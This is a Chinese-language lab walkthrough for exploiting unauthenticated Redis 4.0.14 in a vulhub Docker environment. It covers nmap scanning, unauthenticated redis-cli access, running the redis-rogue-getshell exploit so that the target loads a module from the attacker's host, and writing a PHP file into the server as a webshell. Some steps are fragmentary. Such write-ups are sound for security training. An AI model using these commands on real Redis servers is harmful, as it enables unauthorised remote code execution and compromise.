靶场环境:redis:4.0.14
docker搭建靶场环境
docker-compose up -d
docker-compose ps
未授权访问远程连接
攻击机安装redis,依次执行以下命令
wget http://download.redis.io/releases/redis-2.8.12.tar.gz
tar -xzf redis-2.8.12.tar.gz
cd redis-2.8.12
make
cd src
./redis-cli -h
nmap扫描靶机
nmap -sV --open -p- 192.168.238.156
发现6379、111、80、22端口开启
用攻击机redis连接目标机redis
cd redis-2.8.12/src/
./redis-cli -h 192.168.238.156
使用现有exp实现远程代码执行
克隆exp项目文档
git clone https://github.com/vulhub/redis-rogue-getshell.git
进入该目录下
cd redis-rogue-getshell/RedisModulesSDK/exp
在当前目录下生成一个exp.so文件
make
回到redis-rogue-getshell目录下,利用EXP
./redis-master.py -r 192.168.111.137 -p 6379 -L 192.168.111.139 -P 1111 -f RedisModulesSDK/exp/exp.so -c "id" //第一个ip是靶机,第二个ip是攻击机
写入webshell
指定工作目录
设置数据库文件名
config set dbfilename tyc.php
追加写入tyc.php文件内容
set trojan "<?php phpinfo();?>"
保存
save
将vulhub.zip压缩包复制到靶机中
解压vulhub.zip文件
unzip vulhub.zip
进去对应目录启动容器
安装apache与php
sudo apt install php libapache2-mod-php